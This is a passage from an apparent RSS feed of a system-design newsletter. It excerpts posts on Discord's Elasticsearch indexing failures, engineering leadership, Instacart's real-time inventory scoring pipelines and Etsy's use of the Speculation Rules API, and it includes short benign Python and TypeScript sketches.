6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Workers pulled 50-message batches off the queue. Those messages scattered across 50 different Elasticsearch nodes. One node down? ~40% of bulk operations failed. The entire batch re-queued. Rinse and repeat.</p><p><strong>Large Clusters = High Coordination Tax</strong></p><p>As message volume grew, Discord added nodes. Clusters ballooned to 200+ nodes. 
But more nodes meant:</p><ul><li><p>Higher coordination overhead</p></li><li><p>More frequent failures (any node can fail at any time)</p></li><li><p>Master nodes OOMing from cluster state management</p></li><li><p>No safe path for rolling restarts or upgrades</p></li></ul><p>The Log4Shell vulnerability forced them to take search fully offline just to restart nodes with patched configs.</p><p><strong>The Lucene MAX_DOC Ceiling</strong></p><p>Each Elasticsearch index is a Lucene index under the hood. Lucene caps at ~2 billion documents per index. Large guilds hit this limit. All indexing operations failed. The only fix? Delete spam guilds and hope legitimate communities stayed under the limit.</p><div><hr></div><h2>&#128269; Root Causes</h2>
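<p>The bulk-indexing failure mode above, and the &#8220;batch by destination&#8221; fix mentioned in the TL;DR, is easy to see in miniature. A sketch, not Discord&#8217;s code; <code>route</code>, <code>bulk_index</code>, and <code>requeue</code> are hypothetical stand-ins:</p><pre><code># Sketch only, not Discord's code: group a pulled batch by destination shard
# so one unhealthy node fails one sub-batch instead of the whole bulk request.
from collections import defaultdict

def group_by_destination(messages, route):
    """route(msg) returns the shard or node that owns this message's index."""
    batches = defaultdict(list)
    for msg in messages:
        batches[route(msg)].append(msg)
    return batches

def index_batch(messages, route, bulk_index, requeue):
    for destination, batch in group_by_destination(messages, route).items():
        try:
            bulk_index(destination, batch)  # one bulk request per destination
        except ConnectionError:
            requeue(batch)                  # only this destination's messages retry
</code></pre><p>Grouping by destination turns a single node failure from &#8220;40% of all bulk operations retried&#8221; into &#8220;one sub-batch retried,&#8221; without changing anything about the queue in front of it.</p>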
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-discord-indexes-trillions-of">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The Three Things Only Engineering Leaders Can Do (And Why They’re Not Doing Them)]]></title><description><![CDATA[In true Byte-Sized Fashion, no fancy introduction this week, let&#8217;s just jump straight into it!]]></description><link>https://read.bytesizeddesign.com/p/the-three-things-only-engineering</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-three-things-only-engineering</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 25 Nov 2025 06:00:57 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/ee0f3b34-8608-43f8-93d1-32d213faa2e5_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In true Byte-Sized Fashion, no fancy introduction this week, let&#8217;s just jump straight into it!</p><h3>1. They Abdicate Technical Vision to &#8220;Emerge Organically&#8221;</h3><p>You hired smart people. You trust them to make g&#8230;</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-three-things-only-engineering">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Instacart Scales Real-Time Inventory Predictions Across 80,000 Stores]]></title><description><![CDATA[Here&#8217;s a dirty secret of on-demand commerce: nobody knows the real inventory state of a grocery store.]]></description><link>https://read.bytesizeddesign.com/p/how-instacart-scales-real-time-inventory</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-instacart-scales-real-time-inventory</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 15 Nov 2025 04:13:47 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!dLmH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Here&#8217;s a dirty secret of on-demand commerce: <em>nobody</em> knows the real inventory state of a grocery store. Not the retailer, not the associate, definitely not you.<br>Instacart&#8217;s entire business depends on making that unknowable world feel predictable.</p><p>This edition breaks down the engineering architecture Instacart built to <em>simulate</em> a consistent live inventory model across <strong>hundreds of millions of items</strong>, using a combination of model-driven scoring, lazy refresh pipelines, multi-model experimentation, and a threshold-tuning system that looks more like an F1 control panel than a grocery app.</p><p>This is one of those systems where every layer exists because something simpler exploded.</p><div><hr></div><h1>&#129504; The Core Problem</h1><p>Instacart needs to answer one question&#8212;fast, correctly, and millions of times per minute:</p><blockquote><p><strong>&#8220;If we show this item to a user, how likely is it actually in stock at this specific store&#8230; right now?&#8221;</strong></p></blockquote><p>This prediction drives:</p><ul><li><p>Search ranking</p></li><li><p>Product filtering</p></li><li><p>Shopper routing</p></li><li><p>Customer trust (&#8220;Don&#8217;t show me milk if the store is out of milk again&#8221;)</p></li></ul><p>The output is a <strong>score</strong>, a real-time availability probability that feeds downstream systems.</p><p>The challenge:</p><ul><li><p>Hundreds of millions of items</p></li><li><p>80K+ store locations</p></li><li><p>Score drift happens fast</p></li><li><p>ML model updates happen constantly</p></li><li><p>Retrieval systems need <em>bulk</em> reads with <strong>low latency</strong></p></li><li><p>UI surfaces require <strong>high consistency</strong></p></li></ul><p>You can&#8217;t RPC your way out of this one.</p><div><hr></div><h1>&#9881;&#65039; Real-Time Scoring, but at Scale</h1><p>Instacart receives ML scores from a Real-Time Availability model. But calling the scoring API during search retrieval would have been slower than shopping in real life.</p><p>So they introduced <strong>two ingestion pipelines</strong> to push model outputs <em>into the database</em> ahead of time:</p><h3><strong>1. Full Sync (Snowflake &#8594; DB)</strong></h3><ul><li><p>ML team writes new scores into a Snowflake table multiple times a day</p></li><li><p>Ingestion workers upsert those scores into the serving DB</p></li><li><p>Ensures consistency, especially for long-tail items that rarely get queried</p></li></ul><p>This guarantees freshness, but doing a full sync on hundreds of millions of items is expensive&#8212;both financially and operationally.</p><h3><strong>2. 
Lazy Refresh (Triggered by Search Results)</strong></h3><div class="captioned-image-container"><figure><img src="https://substackcdn.com/image/fetch/$s_!dLmH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp" width="1100" height="578" alt=""></figure></div>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-instacart-scales-real-time-inventory">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Etsy Reduced Page Load Time to 0ms]]></title><description><![CDATA[Etsy shipped a performance improvement so dramatic that 40% of their users now see product pages load in essentially zero milliseconds.]]></description><link>https://read.bytesizeddesign.com/p/how-etsy-reduced-page-load-time-to</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-etsy-reduced-page-load-time-to</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sun, 09 Nov 2025 04:54:55 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!6-hW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9827bf01-777e-48b3-b2e4-83f0ef534a2b_642x527.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Etsy shipped a performance improvement so dramatic that 40% of their users now see product pages load in essentially zero milliseconds. No infrastructure overhaul. No rewrite. Just a clever use of browser prediction and a 15-line JSON config.</p><p>If you&#8217;re thinking &#8220;prefetching is old news,&#8221; I&#8217;ve got news: you haven&#8217;t seen the Speculation Rules API yet.</p><h2>The 200ms Window</h2><p>The traditional web flow is brutally wasteful. User hovers over a product link. User&#8217;s brain decides this looks interesting. User moves cursor to click. Click event fires. Browser initiates request. DNS lookup. TCP handshake. TLS negotiation. HTTP request. Server processing. Response headers. HTML starts streaming. Parser kicks in. More requests for CSS, JavaScript, images.</p><p>The entire time between hover and click&#8212;typically 200-500ms&#8212;the browser just sits there. Your user has already made their decision. The machine is waiting for permission.</p><p>This is the opportunity Etsy exploited.</p><h2>What Makes Speculation Rules Different</h2>
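<p>Etsy&#8217;s exact rules aren&#8217;t reproduced here, but the shape of the API is easy to show. The TypeScript sketch below feature-detects support and injects an illustrative rule set; the URL pattern and eagerness level are assumptions for demonstration, not Etsy&#8217;s actual config.</p><pre><code>// Illustrative only: feature-detect the Speculation Rules API and inject a
// rule set at runtime. The URL pattern and eagerness are assumptions, not Etsy's.
const speculationRules = {
  prefetch: [
    {
      source: "document",
      where: { href_matches: "/listing/*" }, // hypothetical product-page pattern
      eagerness: "moderate"                  // act on hover / pointerdown, not on page load
    }
  ]
};

if ("supports" in HTMLScriptElement) {
  if (HTMLScriptElement.supports("speculationrules")) {
    const script = document.createElement("script");
    script.type = "speculationrules";
    script.textContent = JSON.stringify(speculationRules);
    document.head.appendChild(script);
  }
}
</code></pre><p>&#8220;Moderate&#8221; eagerness maps onto exactly the window described above: the browser starts speculating when the user hovers or presses, so by the time the click lands, much of the work is already done. Browsers that don&#8217;t support the API simply ignore the script type, so it degrades safely.</p>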
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-etsy-reduced-page-load-time-to">
              Read more
          </a>
      </p>
   ]]></content:encoded></item></channel></rss>